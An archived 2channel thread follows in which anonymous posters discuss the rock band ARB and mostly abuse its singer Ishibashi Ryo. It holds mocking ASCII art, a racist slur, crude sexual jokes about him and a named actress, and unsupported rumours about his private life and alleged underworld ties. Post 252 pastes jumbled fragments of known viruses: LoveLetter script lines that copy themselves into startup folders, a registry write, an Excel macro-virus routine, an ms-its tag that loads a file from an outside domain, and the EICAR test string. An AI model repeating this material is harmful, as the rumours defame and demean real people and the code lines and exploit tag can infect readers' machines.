149 :伝説の名無しさん:2006/06/18(日) 01:24:59
     ミミ ヽヽヽヽリリノノノノ
    ミ   ,,、,、,、,、,、,、,、、 彡
     l  i''"        i彡
    .| 」   /' '\  |    
    ,r-/   -・=-, 、-・=- |    
    l       ノ( 、_, )ヽ  |  
    ー'    ノ、__!!_,.、  |  
     ∧     ヽニニソ   l   
   /\ヽ           /    
 /     ヽ.  `ー--一' ノ/ヽ今まで俺様の歌聴いて感動してたくせに
                死ねとはなんだ!死ねとは!!

150 :伝説の名無しさん:2006/06/18(日) 16:23:32
>>149もうお前は死んだよブタ石橋

151 :伝説の名無しさん:2006/06/18(日) 19:25:26
同じく一人ぼっちになった大友康平とデュオでもしてはどうか

152 :伝説の名無しさん:2006/06/18(日) 20:49:39

ものすごいビブラート効かせまくりで鬱陶しそうだw

153 :伝説の名無しさん:2006/06/18(日) 21:12:55
そういえばARBの映画作りたいって言ってなかったっけ。
数年前になるけど。
最近美枝子さんも見ないような希ガス。

154 :伝説の名無しさん:2006/06/18(日) 21:53:13
再結成後の石橋、ARBには興味無いがライブ盤「魂こがして」の完全版は出して欲しい。

155 :伝説の名無しさん:2006/06/19(月) 01:10:28
5月5日(FRI):こどもの日
僕と言う人間がどう見られているのか、久々にネット検索してみた。数年ぶりだな。お〜昔のCDだのが随分売買されているじゃないか。
2ちゃんねるにスレッドは立ってないな。田中一郎発見、2ちゃんねるにしてはマトモな書き込みが多いな。うわ〜モッズ、ARB関連はヒドいや。
個人サイトで僕の曲やらARBの曲やらの論評しているのがあった。ふ〜ん、そういう取られ方してたのか。お! 僕の信奉者がいた! へ〜凄いな〜。


156 :伝説の名無しさん:2006/06/19(月) 12:12:50
どインディープロレス団体 『ユニオンプロレス』のテーマソングがユニオンロッカー
なんだな。笑った。

157 :伝説の名無しさん:2006/06/19(月) 16:49:19
りょうくんも大友康平くらい骨があったらなぁ〜

158 :伝説の名無しさん:2006/06/19(月) 18:08:40
     ミミ ヽヽヽヽリリノノノノ
    ミ   ,,、,、,、,、,、,、,、、 彡
     l  i''"        i彡
    .| 」   /' '\  |    
    ,r-/   -・=-, 、-・=- |    
    l       ノ( 、_, )ヽ  |  
    ー'    ノ、__!!_,.、  |  
     ∧     ヽニニソ   l   
   /\ヽ           /    
 /     ヽ.  `ー--一' ノ/ヽお前達は一生俺の呪縛から逃れられないんだ
                俺を信じて俺の歌を聴き続けろよ

159 :伝説の名無しさん:2006/06/19(月) 18:48:01
       _,,-'' ̄ ̄`-、
       /        \
      ,/           \
     /   ―  ―     ヽ
    lヽ  - 、 ! , _     |      欲しいか?欲しいのか?
    |r――-、_⊥ ,――'-、 |,-,    
    |::::::::::::::::/ |ヽ:::::::::::::::|-|'イ!|  
     ト、__,,/:  |: `、__,,/ ,|ソ/    
     .|    、_ j| _,、     ,|-'
     |   /lll||||||||||l`、   ,|
     `i ,|||' ̄= ̄`|||、 / ト、
     「|ヽ|ll||||||||||||||||| /i |::::\
    /:::::\`!!||||||||||||!!'   |::::::::\
   /::::::::::::::`ー-、.._ i     |::::::::::::::\
  /:::::::::::::::::::::::::::::::::::`ー-、. |::::::::::



160 :伝説の名無しさん:2006/06/19(月) 19:56:53
>>157
骨は無いけど、肉はあるW。

161 :伝説の名無しさん:2006/06/19(月) 23:30:45
毛もない…とほほ

162 :伝説の名無しさん:2006/06/20(火) 19:11:07
しょんべん石橋りょうくん

163 :伝説の名無しさん:2006/06/20(火) 23:47:15
ミニにたこ

164 :伝説の名無しさん:2006/06/21(水) 00:03:39
みんな色々書き込んでるけど、ホントは石橋凌が好きなんだね。
また解散したので、裏切られたと思って悲しくなって書き込んでるんだね。

165 :伝説の名無しさん:2006/06/21(水) 01:39:48
     ミミ ヽヽヽヽリリノノノノ
    ミ   ,,、,、,、,、,、,、,、、 彡
     l  i''"        i彡
    .| 」   /' '\  |    
    ,r-/   -・=-, 、-・=- |    
    l       ノ( 、_, )ヽ  |  
    ー'    ノ、__!!_,.、  |  
     ∧     ヽニニソ   l   
   /\ヽ           /    
 /     ヽ.  `ー--一' ノ/ヽそうさ俺の様なデタラメ人間のファンになったお前らがわるいんだ!。

166 :伝説の名無しさん:2006/06/21(水) 13:12:10
りょうくんはアホです。

167 :伝説の名無しさん:2006/06/22(木) 09:16:09
石橋を一発殴りたい。

168 :伝説の名無しさん:2006/06/22(木) 09:17:21
石橋を一発殴りたい。

169 :伝説の名無しさん:2006/06/22(木) 10:49:31
>>167、168
野坂昭如先生?

170 :伝説の名無しさん:2006/06/22(木) 11:52:50
だけど石橋凌も可哀相な奴だね。どこいっても白い目でみられるんだから。

171 :伝説の名無しさん:2006/06/22(木) 12:43:31
>>170自業自得

172 :伝説の名無しさん:2006/06/23(金) 11:50:00
石橋ハゲウンコ

173 :伝説の名無しさん:2006/06/23(金) 15:35:10
石橋チンポ切れ!!

174 :伝説の名無しさん:2006/06/23(金) 19:37:05
そー
そー
そー
そー

今の世の中
情けもクソもありゃしねぇ



175 :伝説の名無しさん:2006/06/23(金) 22:42:51
石橋は、別の事務所に移籍したらしいね。

176 :伝説の名無しさん:2006/06/24(土) 10:13:46
凌さん、うらみます

177 :伝説の名無しさん:2006/06/24(土) 11:16:39
>>175 情報が遅い。アンチ石橋なら
それをネタになんかカキコしなきゃ。


178 :伝説の名無しさん:2006/06/25(日) 02:27:23
で、何でARB解散したの?石橋のコメント見てもよくわからん・・・

179 :伝説の名無しさん:2006/06/25(日) 18:26:31
石橋にしか分からない…
もっと売れると思ったけど、人気も金も思ったより全然ダメだったからじゃね。
あと曲も今の石橋が作っても微妙だし…

180 :伝説の名無しさん:2006/06/26(月) 00:52:59
脱退しても歌は続けるということは、事務所かメンバーに不満ありということでしょうかね?

181 :伝説の名無しさん:2006/06/26(月) 13:07:29
石橋ってアホだろ

182 :伝説の名無しさん:2006/06/26(月) 13:08:45
中傷誹謗は、ここから出て行け!>>181のバカチン

183 :伝説の名無しさん:2006/06/26(月) 22:12:53
石橋のバカをつるし上げろ

184 :伝説の名無しさん:2006/06/27(火) 05:26:16
>183
日本語わかるか?

185 :伝説の名無しさん:2006/06/27(火) 08:33:59
糖尿だろ?石橋は。

186 :伝説の名無しさん:2006/06/27(火) 12:49:15
キースは

187 :伝説の名無しさん:2006/06/27(火) 20:36:36
>186
キースがどうした?

188 :伝説の名無しさん:2006/06/27(火) 21:01:37
石橋なんて中途半端な奴は何やっても成功しねーよ

189 :伝説の名無しさん:2006/06/28(水) 07:31:34
     ミミ ヽヽヽヽリリノノノノ
    ミ   ,,、,、,、,、,、,、,、、 彡
     l  i''"        i彡
    .| 」   /' '\  |    
    ,r-/   -・=-, 、-・=- |    
    l       ノ( 、_, )ヽ  |  
    ー'    ノ、__!!_,.、  |  
     ∧     ヽニニソ   l   
   /\ヽ           /    
 /     ヽ.  `ー--一' ノ/ヽ中途半端な俺の歌聴いて感動してたのお前らだろW

190 :伝説の名無しさん:2006/06/28(水) 09:59:57
キースは、彼の

191 :伝説の名無しさん:2006/06/28(水) 17:23:39
>>190
なになに?キースは彼の?


192 :伝説の名無しさん:2006/06/28(水) 17:41:55
キースは、彼の 理解者だったけど。

彼(石橋のクソ)はキースを裏切った、コウヤを裏切った、エビを裏切った

そして俺たちを裏切った。




193 :伝説の名無しさん:2006/06/28(水) 18:19:04
キースは、彼の存在が


194 :伝説の名無しさん:2006/06/28(水) 18:29:18
http://mirror.jijisama.org/sangokuzin.htm
真実だよ

195 :伝説の名無しさん:2006/06/28(水) 22:28:05
>194
それが、石橋となんか関係あるの?

196 :伝説の名無しさん:2006/06/29(木) 07:28:20
石橋は三国人師ね

197 :伝説の名無しさん:2006/06/29(木) 11:34:34
     ミミ ヽヽヽヽリリノノノノ
    ミ   ,,、,、,、,、,、,、,、、 彡
     l  i''"        i彡
    .| 」   /' '\  |    
    ,r-/   -・=-, 、-・=- |    
    l       ノ( 、_, )ヽ  |  
    ー'    ノ、__!!_,.、  |  
     ∧     ヽニニソ   l   
   /\ヽ           /    
 /     ヽ.  `ー--一' ノ/ヽお前らは俺のウンチ食ってたらいいんだヨ。

198 :伝説の名無しさん:2006/06/29(木) 13:03:20
>>197
ほっとにムカつく野郎だな!お前がウンチ食えよ三国石橋のボケッ!

199 :伝説の名無しさん:2006/06/29(木) 15:13:46
石橋の外人の愛人は、以前は某アーティストの愛人
皆、兄弟

200 :伝説の名無しさん:2006/06/29(木) 15:54:30
甲斐もねーくせに愛人作んなボケ!

201 :伝説の名無しさん:2006/06/29(木) 18:12:57
>>197〜200
 バカばかりw

202 :伝説の名無しさん:2006/06/29(木) 20:34:44
石橋は、みんなを裏切ったのはわかった。裏切った内容や解散の理由を知りたい。

203 :伝説の名無しさん:2006/06/29(木) 20:41:28
何もかも自分の思い通りにならなかったから嫌になったとかだべ。
いい年して、自分を過大評価してんだよ。

204 :伝説の名無しさん:2006/06/30(金) 13:26:30
http://fout.garon.jp/?key=GC0G5ybMvx4zSTZO0C0UpLo:K0E0&ext=jpg&act=view
石橋は肥り気味

205 :伝説の名無しさん:2006/06/30(金) 22:10:47
石橋マンセーのヤシはいないの?

206 :伝説の名無しさん:2006/06/30(金) 23:11:47
そんなヤシいたら叩かれるのがオチさ

207 :伝説の名無しさん:2006/07/01(土) 17:04:28
娘初公開、似てる?
http://www.ntv.co.jp/ryugaku/cha.html

208 :伝説の名無しさん:2006/07/01(土) 20:08:44
石橋はもう終わった。

209 :伝説の名無しさん:2006/07/01(土) 20:22:42
 :.
 ::::..
  ::::...  なあARBもう終わっちゃたのかな?
   ::::...
   ::::... ∧_∧_∧
    ::::.(∀・( ´∀`)  バカ野郎!まだ始まってもいねえよ!
   r -(  ( O┰O、  
  ..::ii'⌒< <  ) 冊冊〉
  ::'、__,,l!しし(_)l!lJ´
          '、__,l!j



210 :伝説の名無しさん:2006/07/01(土) 21:26:43
今日は一郎の野音の日だな。
無事成功したんだろうか?

211 :伝説の名無しさん:2006/07/01(土) 21:49:04
一郎は石橋とは違うから、きっと成功するよ。

212 :伝説の名無しさん:2006/07/02(日) 20:56:53
全てのメディア観てるわけではないので脱退真相がどこがで
語られてるかもしれないけど、でてないこと前提で。
脱退の真相が雑誌など明らかにならないのは、
記事にして発表したことろで金にならない
(雑誌の売上があがらない)から?
雑誌買う層っておっさんが多いARBリスナーに
合致しないんじゃないんでしょうか。
おっさんリスナーばっかのARBとりあげるんなら
1ページでも雑誌買いそうな若年層ねらいで記事うめたほうがよさそうな。

213 :伝説の名無しさん:2006/07/02(日) 22:12:59

おばちゃん頭いいね!

214 :伝説の名無しさん:2006/07/03(月) 00:39:13
>212
それは承知のうえなんだけど、やはり真相知りたい。
なんでだろうね・・・売れてないのもわかるし、CD屋に逝っても
ARBコーナーなんて当然なくて、「エ行」にすらなかったりする。
最後のベスト盤は入荷予定もなかった。いつ解散したかわからないファンの
ヤツラもいるらしい。もしかしたら、未だに知らないヤシもいるかも。

215 :伝説の名無しさん:2006/07/03(月) 03:29:27
こんな事があった。よく行くCD屋の人はARBはファンらしく音源も充実してた。
しかし隠し子騒動があってからARBのCDを置かなくなってた。
これが世間一般の答えだ。

甘えんな石橋!!!!!!!!!!!!


216 :伝説の名無しさん:2006/07/03(月) 09:20:30
KEITHかわいそう
KEITHの刺青は凄い

217 :伝説の名無しさん:2006/07/03(月) 10:17:18
石橋は原田の巨乳に飽きた
おかげで原田は乳首吸われすぎで、黒乳首!
吉原で石橋の巨乳好きは有名だが、乳首取れるまで
吸い付くのは辞めようね、痛いからね、ユウ姫が嘆いていたぞ!

218 :伝説の名無しさん:2006/07/03(月) 12:08:29
TVファイティング80の頃のARB見ると新鮮だ
物置からビデオでて来たw

219 :伝説の名無しさん:2006/07/03(月) 12:30:16
218
  よかったね

220 :伝説の名無しさん:2006/07/03(月) 19:42:30
だけどさぁ人間生きてたら思い出したくも無い恥ずかしい事ってあるじゃん。
石橋凌にとっては隠し子がそれなんだな。
ほんと穴があったら入りたいくらいの。
いままでカッコつけてた奴がさテレビで涙ぐんで釈明なんてダサすぎだろ。
歌も威風堂々なんてダサい自己弁護の歌うたったりさ。
そして金の為に再結成したARBも自分のダサさに耐え切れず逃げるように辞めるしさ。

あのカスにはもう二度とARBの歌歌って欲しくないね。

221 :伝説の名無しさん:2006/07/03(月) 21:48:22
ヤツなら歌い続けるだろうな。ARB時代の歌しかないし。
それぐらいしか客も沸かないだろ。「魂こがして」は聴き飽きたな。

222 :伝説の名無しさん:2006/07/03(月) 22:31:32
LOFT25時をひっさげLOFT30周年イベントで荒稼ぎ!

223 :伝説の名無しさん:2006/07/04(火) 02:16:04
田中一郎と電撃和解しねーかなー。

224 :伝説の名無しさん:2006/07/04(火) 11:43:10
裏では某暴力団幹部と繋がりがあり
興業面で、彼と

225 :伝説の名無しさん:2006/07/04(火) 14:02:42
タニマチのI氏と共闘を組み

226 :伝説の名無しさん:2006/07/05(水) 09:41:20
りょうくんはママのおっぱいが欲しいんでつね。

227 :伝説の名無しさん:2006/07/05(水) 13:20:09
りょうくんは仕事も無いのにどうやって家族を養っているのでつか?

228 :伝説の名無しさん:2006/07/05(水) 15:52:06
しかし肥え過ぎだろ?
http://fout.garon.jp/?key=Gx0RrFmC9QgRMLVDaRbYdD5:sV9&ext=jpg&act=view

229 :伝説の名無しさん:2006/07/05(水) 21:29:38
最後に出したライブベストで少しの間、食っていけるかも・・・

230 :伝説の名無しさん:2006/07/05(水) 21:43:02
↑8月にまた出すらしいよ〜
情けない…

231 :伝説の名無しさん:2006/07/06(木) 09:59:13
>>230
 真弓ちゃんが言ってるよ
 http://cocoa.gazo-ch.net/bbs/10/img/200510/456547.jpg

232 :伝説の名無しさん:2006/07/08(土) 01:31:48
ARB活動停止のニュースが流れた時、
AKB48が活動停止した
、と勘違いしたオタが続出したらしいな

233 :伝説の名無しさん:2006/07/08(土) 01:55:15
     ミミ ヽヽヽヽリリノノノノ
    ミ   ,,、,、,、,、,、,、,、、 彡 
     l  i''"        i彡
     | 」  ⌒' '⌒  |  
    ,r-/  <・> < ・> |     ロックなんて金にならないし辞めて正解だったぜ
    l       ノ( 、_, )ヽ |      やっぱり俳優がサイコーだぜ!
    ー'    ノ、__!!_,.、|        
     ∧     ヽニニソ  l      
   /\ヽ         /    
 /     ヽ.  `ー--一' ノ/ヽ    ノ7_,,, 、    ______
/   (⌒、"⌒ソ⌒ヽ─ '"   `、  ( ィ⌒ -'"",う/壱 / /万:/|
    ~''(_)(_)(_)(_)ソ       ヽノ   ,イ^_.|≡≡|__|≡≡|彡|_____
    ヽ/`、_, ィ/           ヽ─/ ̄//|≡≡|__|≡≡|/壱//万 :/|
   /     /           ) / ≡|__|≡|≡≡|__|≡≡|≡≡|__|≡≡|彡|
         /            i|≡≡|__|≡|≡≡|__|≡≡|≡≡|__|≡≡|彡|
\      ノ             |≡≡|__|≡|≡≡|__|≡≡|≡≡|__|≡≡|彡|
  \__ /             ノ|≡≡|__|≡|≡≡|__|≡≡|≡≡|__|≡≡|/




234 :伝説の名無しさん:2006/07/08(土) 10:47:01
再び白浜久について語ろう
http://music4.2ch.net/test/read.cgi/legend/1148362028/l50

235 :伝説の名無しさん:2006/07/08(土) 13:21:54
シンコーのチューリップの弟分だったバンドだから
ロフトがリザードの前座をやらせたりして無理やり
パンクにしたてあげたのだが結局無理がたたったんだろう

まともなのはルースターズだけ

236 :伝説の名無しさん:2006/07/08(土) 19:06:00
無理矢理パンクじゃなくて、ベイシティーローラーズみたいにしたかったんだよ。

237 :伝説の名無しさん:2006/07/08(土) 19:07:46
石橋くん

238 :伝説の名無しさん:2006/07/08(土) 19:11:10
          ぐ
    ぐ  る         ―    ̄   __     ∩2z、
    る   ん   _ -  ̄           ― ニ二./  /
 十  ん               (^ε^  )       /`/
      ,  '    _   l´   '⌒ヽ-‐  /  /  } }  +
    / /     /       リ     |  |   /  ノ
 C、/ /        ╋  /      |  |/  /  //
&  \____/      /     ノ/ _/―''
 ⌒ヽ-、__/   ̄ ̄ ̄`ヽ   '´   /   十
      /  ̄ ̄`ー- ...,,_災__,/| /        +
              /   ノ {=   | |
 +            ∠ム-'    ノ,ィi、ヽ、
          十              ̄

239 :ドレミファ名無しド:2006/07/09(日) 12:52:37
てか、サンジが使ってたベースって何?

240 :伝説の名無しさん:2006/07/11(火) 12:28:04
石橋りょうくんウンチage

241 :伝説の名無しさん:2006/07/11(火) 12:30:34
どうして石橋はあんなダサい奴になっちまったんだ?

優作にケツの穴掘られたか?

242 :伝説の名無しさん:2006/07/11(火) 16:56:29
もうりょうくんのケツの穴はガバガバ

243 :伝説の名無しさん:2006/07/11(火) 22:42:11
おいっ!凌!ケツの穴突き出せ!

244 :伝説の名無しさん:2006/07/12(水) 01:32:47
うんこ

245 :伝説の名無しさん:2006/07/12(水) 18:35:42
凌くんのうんこ伝説

246 :伝説の名無しさん:2006/07/13(木) 21:43:18
     ミミ ヽヽヽヽリリノノノノ
    ミ   ,,、,、,、,、,、,、,、、 彡
     l  i''"        i彡
    .| 」   /' '\  |    
    ,r-/   -・=-, 、-・=- |    
    l       ノ( 、_, )ヽ  |  
    ー'    ノ、__!!_,.、  |  
     ∧     ヽニニソ   l   
   /\ヽ           /    
 /     ヽ.  `ー--一' ノ/ヽ俺がウンチだったらお前らはウジ虫だなw。


247 :伝説の名無しさん:2006/07/13(木) 21:44:58
     ミミ ヽヽヽヽリリノノノノ
    ミ   ,,、,、,、,、,、,、,、、 彡
     l  i''"        i彡
    .| 」   /' '\  |    
    ,r-/   -・=-, 、-・=- |    
    l       ノ( 、_, )ヽ  |  
    ー'    ノ、__!!_,.、  |  
     ∧     ヽニニソ   l   
   /\ヽ           /    
 /     ヽ.  `ー--一' ノ/ヽ優作さんのチンポの味は忘れられなねぇ〜

248 :伝説の名無しさん:2006/07/14(金) 02:58:56
汚れリョウくん乙

249 :伝説の名無しさん:2006/07/14(金) 18:46:38
凌さんは大友コブ平より断然マシ

250 :伝説の名無しさん:2006/07/14(金) 23:52:32
今日、某イベントで、幸也&EBI、ボーカル仲野茂で「KAZA-BANA」と「東京CITYは風だらけ」やったよ。
ふたりを見たら何だか少し切なくなった。

251 :伝説の名無しさん:2006/07/15(土) 02:26:19
>>250
kwsk

252 :伝説の名無しさん:2006/07/15(土) 11:21:41
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

253 :伝説の名無しさん:2006/07/15(土) 22:28:22
りょうくんダサイ

254 :伝説の名無しさん:2006/07/16(日) 00:46:12
     ミミ ヽヽヽヽリリノノノノ
    ミ   ,,、,、,、,、,、,、,、、 彡
     l  i''"        i彡
    .| 」   /' '\  |    
    ,r-/   -・=-, 、-・=- |    
    l       ノ( 、_, )ヽ  |  
    ー'    ノ、__!!_,.、  |  
     ∧     ヽニニソ   l   
   /\ヽ           /    
 /     ヽ.  `ー--一' ノ/ヽ俺と田代まさしは同類か?

255 :伝説の名無しさん:2006/07/17(月) 15:23:40
デブりょうく〜ん

256 :伝説の名無しさん:2006/07/18(火) 17:36:17
     ミミ ヽヽヽヽリリノノノノ
    ミ   ,,、,、,、,、,、,、,、、 彡
     l  i''"        i彡
    .| 」   /' '\  |    
    ,r-/   -・=-, 、-・=- |    
    l       ノ( 、_, )ヽ  |  
    ー'    ノ、__!!_,.、  |  
     ∧     ヽニニソ   l   
   /\ヽ           /    
 /     ヽ.  `ー--一' ノ/ヽ俺はこれからどうすればいいんだ、みんな俺を哀れんでもっと応援してくれ。

257 :伝説の名無しさん:2006/07/20(木) 20:04:31
石橋おわたw

258 :伝説の名無しさん:2006/07/20(木) 21:34:23
平成になる前に既に終わってますけど。

259 :伝説の名無しさん:2006/07/20(木) 22:29:38
労働者がナンタラって働いている人間を食い物にしているようなもん?
ホリエと変わらないのかな

260 :伝説の名無しさん:2006/07/20(木) 22:30:08
ファンの皆様へ

俺の"命"であるARBを守るために、
こういう結論を出しました。

"ロックンロール"とは、己の信じた道を
傷だらけになっても
転がり続けることだと思っています。

何よりも、俺たちを支えてくれたファンのみんなにまた迷惑をかけ、
不安を与えてしまったことを、こころからお詫びしたい。

裏切り者と呼ぶヤツは呼べばいい、
しかし、俺のことを信じられる人は、
とことんついて来い!

俺は決して守りには入らないぜ!
明日のことはわからねえ、
いまこの瞬間を熱く生きるだけさ!

ロックンロールがあるじゃねえか!&ローリング・マイ・ライフ!  

石橋凌


261 :伝説の名無しさん:2006/07/20(木) 23:03:23
どうでもいいけどカッコ悪いんだよリョウくん

262 :伝説の名無しさん:2006/07/21(金) 13:01:53
再結成なんてしなきゃ良かったのにね
俺の中では1990年6月16、17日で終わってバンドだから
どうでもいいけど
大人になってから冷静に石橋凌を見てみると意志薄弱な痛い奴としか思えない
役者としても通り一遍な表現力しかないし
本当に残念だよ
ただキースにだけは本当に幸せでいて欲しい

263 :伝説の名無しさん:2006/07/21(金) 13:13:33
石橋は勘違いしてる
自惚れが強い奴だな!最近やっと己自身が
くだらい人物だとわかったみたいだな!

264 :伝説の名無しさん:2006/07/22(土) 00:08:27
りょうくんの未来は暗すぎる

265 :伝説の名無しさん:2006/07/22(土) 00:19:22
ウイルスタグ貼った人迷惑・・・

266 :伝説の名無しさん:2006/07/22(土) 08:53:34
石橋はもう消えるんじゃね。

267 :伝説の名無しさん:2006/07/22(土) 13:11:23
へたくそばんど
へたくそばんど
へたくそばんど

268 :ドレミファ名無シド:2006/07/23(日) 00:16:45
さいこ〜


269 :伝説の名無しさん:2006/07/25(火) 17:12:48
 こんなとこに書き込んでる暇
あったら日のひかりを少しは
浴びな!!

270 :伝説の名無しさん:2006/07/26(水) 12:42:43
>>259
イタメシ屋で バイト1年くらいしかしてないヤツの唄うワークソングに
影響されるヤツが なん人いるんだ?こいつは就職したことはないんだぞ!
こいつの自伝読んだら バイトだったのに イタメシ屋2号店を任されそうに
なったとか言ってるけど 経験も浅いヤツに任せよーとするイタメシ屋って
なんなんだよ。ピザの宅配屋以下なんだろーなwwwwwwww

271 :伝説の名無しさん:2006/07/26(水) 17:41:41
 >>270 そういうこと言ってる君が
まずは就職しな。
 平日の真昼間に2ちゃんねるに書き込んでる
暇あったら外にでて日の光をあびな。

 ヒッキ−でニ−トな君に石橋のみならず、一般人のイタメシ屋
の主人まで罵倒する資格はない。

 まずは自分がバイトでもいいからちったぁ外で
働いてみることだね。

272 :伝説の名無しさん:2006/07/27(木) 00:42:23
4月に就職したところが最悪なので辞めたいです。
現に同期が6月に集団退社しました。
日雇いやバイトの方が数百倍マシです。

前のツアーで一列目体験して以来、ほとんど聞いていません。
新曲出るのを待ってたつもりだったんですが・・・。

273 :伝説の名無しさん:2006/07/27(木) 12:34:09

就職したことがナイ奴がワークソング歌ってるwwwwwwwwwww
ひでぇなwwwwwwwこの石橋ってのwwwwwwwww
かっこいいこと言ってガキから金巻き上げてんだなwwwwwwwww

274 :伝説の名無しさん:2006/07/27(木) 22:23:14
別に実体験がなければ唄を歌えないわけではない。
石橋の唄には説得力があったのだ。

田中一郎がギターを弾いている間までは。

57 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)